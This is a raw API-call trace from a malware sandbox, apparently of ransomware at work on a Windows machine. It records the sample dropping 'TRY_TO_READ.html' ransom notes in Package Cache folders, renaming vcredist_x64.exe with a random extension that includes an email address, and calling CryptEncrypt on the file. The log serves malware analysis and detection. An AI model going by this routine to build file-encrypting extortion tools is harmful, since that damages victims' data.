	[0107.504] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58c
	[0107.505] FindNextFileW (in: hFindFile=0x37b04a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.505] FindNextFileW (in: hFindFile=0x37b04a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.505] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b04e0
	[0107.505] FindNextFileW (in: hFindFile=0x37b04e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.505] FindNextFileW (in: hFindFile=0x37b04e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.505] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x590
	[0107.507] FindNextFileW (in: hFindFile=0x37b04e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.507] FindNextFileW (in: hFindFile=0x37b04e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.507] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0520
	[0107.508] FindNextFileW (in: hFindFile=0x37b0520, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.508] FindNextFileW (in: hFindFile=0x37b0520, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.508] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x594
	[0107.510] FindNextFileW (in: hFindFile=0x37b0520, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.510] FindNextFileW (in: hFindFile=0x37b0520, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.510] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0560
	[0107.510] FindNextFileW (in: hFindFile=0x37b0560, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.510] FindNextFileW (in: hFindFile=0x37b0560, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.510] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x598
	[0107.512] FindNextFileW (in: hFindFile=0x37b0560, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.512] FindNextFileW (in: hFindFile=0x37b0560, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.512] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b05a0
	[0107.512] FindNextFileW (in: hFindFile=0x37b05a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.512] FindNextFileW (in: hFindFile=0x37b05a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.512] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x59c
	[0107.515] FindNextFileW (in: hFindFile=0x37b05a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.515] FindNextFileW (in: hFindFile=0x37b05a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.515] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b05e0
	[0107.515] FindNextFileW (in: hFindFile=0x37b05e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.515] FindNextFileW (in: hFindFile=0x37b05e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.515] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a0
	[0107.518] FindNextFileW (in: hFindFile=0x37b05e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.518] FindNextFileW (in: hFindFile=0x37b05e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.518] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0620
	[0107.518] FindNextFileW (in: hFindFile=0x37b0620, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.519] FindNextFileW (in: hFindFile=0x37b0620, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfe3882c0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1
	[0107.519] FindNextFileW (in: hFindFile=0x37b0620, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c1e110, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c1e110, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c1e110, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.519] FindNextFileW (in: hFindFile=0x37b0620, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf0a0a700, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1
	[0107.519] FindNextFileW (in: hFindFile=0x37b0620, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf0a0a700, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0
	[0107.519] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.519] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.519] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe", dwFileAttributes=0x80) returned 1
	[0107.519] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 89
	[0107.519] GetProcessHeap () returned 0x540000
	[0107.519] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x118) returned 0x57fb28
	[0107.519] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"
	[0107.519] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.519] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.527] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a4
	[0107.527] GetProcessHeap () returned 0x540000
	[0107.527] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.528] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=455576) returned 1
	[0107.528] SetFilePointer (in: hFile=0x5a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x6f398
	[0107.528] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.528] GetProcessHeap () returned 0x540000
	[0107.528] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
